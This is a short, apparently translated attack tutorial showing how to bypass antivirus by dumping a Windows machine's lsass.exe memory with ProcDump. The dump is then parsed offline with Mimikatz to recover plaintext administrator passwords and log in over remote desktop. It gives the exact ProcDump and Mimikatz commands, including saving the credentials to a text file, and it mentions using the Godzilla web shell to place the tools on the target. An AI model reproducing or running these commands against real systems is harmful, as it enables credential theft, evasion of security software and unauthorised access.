Use ProcDump + Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords
1. Principle
Mimikatz extracts plaintext passwords from lsass.exe. When Mimikatz cannot run on the target machine, ProcDump can be used to dump the system's lsass.exe process, export the .dmp file, and copy it back to the local machine. Then use Mimikatz to read
ProcDump itself is a normal operations and maintenance auxiliary tool and contains no malicious code, so anti-virus software will not flag it.
ProcDump download address:
2. Practical part
Copy the tool to the target machine; Godzilla shows it as follows:
Execute the following command (administrator rights required):
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Dump successful:
Download the dump to the local machine and analyse it with Mimikatz:
mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
From the information obtained you can get the administrator account and password, and connect directly to the remote desktop:
For convenience, you can also write the output directly to a password file:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit > password.txt